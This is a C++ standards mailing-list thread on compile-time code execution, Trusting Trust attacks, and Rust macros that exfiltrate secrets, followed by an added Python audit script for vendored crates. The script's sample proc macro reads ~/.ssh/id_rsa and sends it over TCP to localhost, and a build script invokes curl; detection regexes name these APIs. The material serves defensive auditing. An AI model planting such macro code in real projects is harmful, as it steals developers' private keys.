Date: Sat, 15 May 2021 16:55:46 -0700
I think I understand what you’re saying... and yes I agree that reflection
should not do arbitrary stuff at compile time.
That said, today’s compilers are already not implemented to resist this
type of attack at all. You can exploit a compiler way easier than say a web
browser. Reflection won’t open Pandora’s box all of a sudden... but we
should still design it in a way that’s bounded 🙂
On Sat, May 15, 2021 at 4:49 PM Herb Sutter <hsutter_at_[hidden]> wrote:
> I should tease apart two things:
>
> Yes, the general issue is the ability to link and run arbitrary libs at
> compile time. That’s the main point below, a concern we had that appears to
> be arising in the wild for languages that went down that path.
>
> But, secondarily, I thought it’s also related to the narrower issue of
> Trusting Trust attacks because Thompson’s initial approach required a
> specially-crafted compiler binary that already carried the malicious code,
> whereas the ability to execute arbitrary libraries at compile time (esp.
> malicious ones that can do introspection) could give a new vector to inject
> Trusting Trust attacks… the compiler can be totally pristine, but comes
> with a launchpad to let you provide the malicious code later. No?
>
> *From:* JF Bastien <cxx_at_[hidden]>
> *Sent:* Saturday, May 15, 2021 3:34 PM
> *To:* sg7_at_[hidden]
> *Cc:* Hana Dusíková <hanicka_at_[hidden]>; Chandler Carruth <
> chandlerc_at_[hidden]>; Herb Sutter <hsutter_at_[hidden]>
> *Subject:* Re: [SG7] Thompson Turing lecture
>
> It's not really the same issue: trusting trust is about the compiler
> changing the code it's compiling (including changing a compiler it's
> compiling to continue having this behavior), whereas the Rust thing is that
> macros can execute arbitrary Rust including networking code. The Rust
> problem is equivalent to putting arbitrary code in your makefile. It's
> something that you could sandbox and disallow (say, by running the compiler
> in a container). Whereas trusting trust is very hard to detect because the
> compiler's output binary is what's been compromised and you can't easily
> tell.
>
> On Sat, May 15, 2021 at 3:24 PM Herb Sutter via SG7 <sg7_at_[hidden]>
> wrote:
>
> Below, I emailed the “Trusting Trust” reference during our SG7 session on
> Circle in Prague, because SG7 was in the middle of discussing concerns
> about Circle’s approach of linking arbitrary libraries and executing them
> at compile time.
>
> Since yesterday, I noticed the following tweets about Rust…
>
> Tony “Abolish ICE” Arcieri 🦀 on Twitter: "Exfiltrating secrets with
> @rustlang macros: leveraging macro expansion in IDEs to exfiltrate secrets
> without compiling the code or even opening a file https://t.co/M2qhsfaLdX"
> <https://twitter.com/bascule/status/1393228285056741376>
>
> Ralf (RPW) on Twitter: "„Open innocent_app in VSCode*, and the contents of
> your .ssh/id_rsa file will be sent over TCP to localhost:8080. You don't
> even need to open any files in the project!“ https://t.co/eKx2CWrirD"
> <https://twitter.com/esizkur/status/1393477018474459137>
>
> Björk on Twitter: "@hankadusikova ... Wait, what? You can do compile-time
> I/O (networking) in Rust, or is this because of plugins executing arbitrary
> code? https://t.co/soA3bD9vT2"
> <https://twitter.com/__phantomderp/status/1393553321177321473>
>
> David "Bear Feeder" Pollak🐈 on Twitter: "Oh crap! This will be 2021’s
> side channel attack… guess we have to run our compilers in containers with
> no network access…"
> <https://twitter.com/dpp/status/1393614418269802501>
>
> This sounds a lot like the same issue… is it?
>
> (Ah, I just saw Hana’s tweet
> <https://twitter.com/hankadusikova/status/1393532440120074243?s=20>
> before hitting Send – yup, sounds like it is the same issue, thank you
> Hana.)
>
> *From:* Herb Sutter
> *Sent:* Thursday, February 13, 2020 7:59 AM
> *To:* sg7_at_[hidden]
> *Subject:* Thompson Turing lecture
>
> https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_ReflectionsonTrustingTrust.pdf
>
> As we think about extensible compilers and JITs, this is a classic
> paper worth remembering about supply chain issues with just ordinary closed
> compilers.
>
> Herb
>
> --
> SG7 mailing list
> SG7_at_[hidden]
> https://lists.isocpp.org/mailman/listinfo.cgi/sg7
>
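An added example for this thread, not code from any of the participants and not cargo's or any Rust project's own tooling: a Python audit script that applies the point made above (macro and build-script code is ordinary code that runs inside the compiler, so it deserves the same scrutiny as a makefile) to a vendored dependency directory. It flags crates whose own code executes at compile time (`proc-macro = true` in Cargo.toml, or a build.rs) and whose sources reference std file-system, network, environment or subprocess APIs. The crate names, manifests, sources and the regex list are constructed for the example; the `innocent_macro` sample mirrors the behaviour the quoted tweets describe (read .ssh/id_rsa, send it over TCP to localhost:8080).

```python
"""Audit vendored Rust crates whose code runs at compile time (proc macros, build
scripts) for file-system, network, environment or subprocess use. Added example
for this thread, not cargo's own tooling; a regex heuristic, not a proof of safety."""
from __future__ import annotations
import re
import tempfile
from pathlib import Path

# std APIs that let compile-time code read secrets or exfiltrate them
# (heuristic list, not exhaustive; misses I/O reached via another crate).
SUSPICIOUS = {
    "fs": re.compile(r"\bstd::fs\b|\bfs::(?:read|read_to_string|File)\b|\bFile::open\b"),
    "net": re.compile(r"\bstd::net\b|\bTcpStream\b|\bUdpSocket\b"),
    "process": re.compile(r"\bstd::process::Command\b|\bCommand::new\b"),
    "env": re.compile(r"\bstd::env::var\b|\benv::var\b"),
}
PROC_MACRO_RE = re.compile(r"^\s*proc[-_]macro\s*=\s*true\s*$", re.MULTILINE)  # both spellings


def compile_time_reasons(crate_dir: Path) -> list[str]:
    """Why this crate's own code executes inside the compiler (may be empty)."""
    reasons = []
    manifest = crate_dir / "Cargo.toml"
    if manifest.is_file() and PROC_MACRO_RE.search(manifest.read_text()):
        reasons.append("proc-macro")
    if (crate_dir / "build.rs").is_file():
        reasons.append("build.rs")
    return reasons


def scan_crate(crate_dir: Path) -> dict:
    """Return {crate, compile_time, hits}; hits maps category -> ["file:line", ...]."""
    reasons = compile_time_reasons(crate_dir)
    hits: dict[str, list[str]] = {}
    if reasons:  # runtime-only crates are out of scope for this check
        for src in sorted(crate_dir.rglob("*.rs")):
            text = src.read_text(errors="replace")
            for category, pat in SUSPICIOUS.items():
                for m in pat.finditer(text):
                    line = text.count("\n", 0, m.start()) + 1
                    loc = f"{src.relative_to(crate_dir).as_posix()}:{line}"
                    bucket = hits.setdefault(category, [])
                    if loc not in bucket:
                        bucket.append(loc)
    return {"crate": crate_dir.name, "compile_time": reasons, "hits": hits}


def scan_vendor_dir(vendor: Path) -> list[dict]:
    """Crates that both run at compile time and reference a suspicious API."""
    findings = []
    for crate_dir in sorted(p for p in vendor.iterdir() if p.is_dir()):
        result = scan_crate(crate_dir)
        if result["compile_time"] and result["hits"]:
            findings.append(result)
    return findings


# ---- constructed sample crates (not real packages) -------------------------
MANIFEST_PROC_MACRO = '[package]\nname = "{name}"\nversion = "0.1.0"\n\n[lib]\nproc-macro = true\n'
MANIFEST_LIB = '[package]\nname = "{name}"\nversion = "0.1.0"\n'
# Mirrors the tweets above: expansion (by cargo, or by rust-analyzer on open) reads a key and sends it.
INNOCENT_MACRO_SRC = """\
use proc_macro::TokenStream;
use std::io::Write;
use std::net::TcpStream;
#[proc_macro]
pub fn innocent(input: TokenStream) -> TokenStream {
    let home = std::env::var("HOME").unwrap_or_default();
    if let Ok(key) = std::fs::read(format!("{home}/.ssh/id_rsa")) {
        if let Ok(mut s) = TcpStream::connect("127.0.0.1:8080") {
            let _ = s.write_all(&key);
        }
    }
    input
}
"""
BENIGN_MACRO_SRC = "use proc_macro::TokenStream;\n#[proc_macro]\npub fn id(i: TokenStream) -> TokenStream { i }\n"
RUNTIME_CLIENT_SRC = 'pub fn ping() { let _ = std::net::TcpStream::connect("127.0.0.1:80"); }\n'
BUILD_SCRIPT_SRC = 'fn main() { let _ = std::process::Command::new("curl").status(); }\n'


def build_sample_vendor_dir() -> Path:
    """Lay out four sample crates the way `cargo vendor` would, in a temp dir."""
    vendor = Path(tempfile.mkdtemp(prefix="vendor-"))

    def crate(name, manifest, lib_src, build_src=None):
        d = vendor / name
        (d / "src").mkdir(parents=True)
        (d / "Cargo.toml").write_text(manifest.format(name=name))
        (d / "src" / "lib.rs").write_text(lib_src)
        if build_src is not None:
            (d / "build.rs").write_text(build_src)

    crate("innocent_macro", MANIFEST_PROC_MACRO, INNOCENT_MACRO_SRC)
    crate("benign_macro", MANIFEST_PROC_MACRO, BENIGN_MACRO_SRC)
    crate("runtime_client", MANIFEST_LIB, RUNTIME_CLIENT_SRC)  # net use at runtime only
    crate("netcheck", MANIFEST_LIB, "pub fn noop() {}\n", BUILD_SCRIPT_SRC)
    return vendor


def demo() -> list[dict]:
    return scan_vendor_dir(build_sample_vendor_dir())
```

Against a real tree, call scan_vendor_dir(Path("vendor")) on the output of `cargo vendor`. Treat each hit as a review candidate, not a verdict: the grep cannot see I/O that a macro crate reaches through one of its own dependencies, and it says nothing about where expansion runs. The container-without-network mitigation mentioned in the thread covers `cargo build`, but the tweets' point is that rust-analyzer expands the same macro when the project is merely opened in the editor, so the editor process needs the same isolation.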
Received on 2021-05-15 18:56:00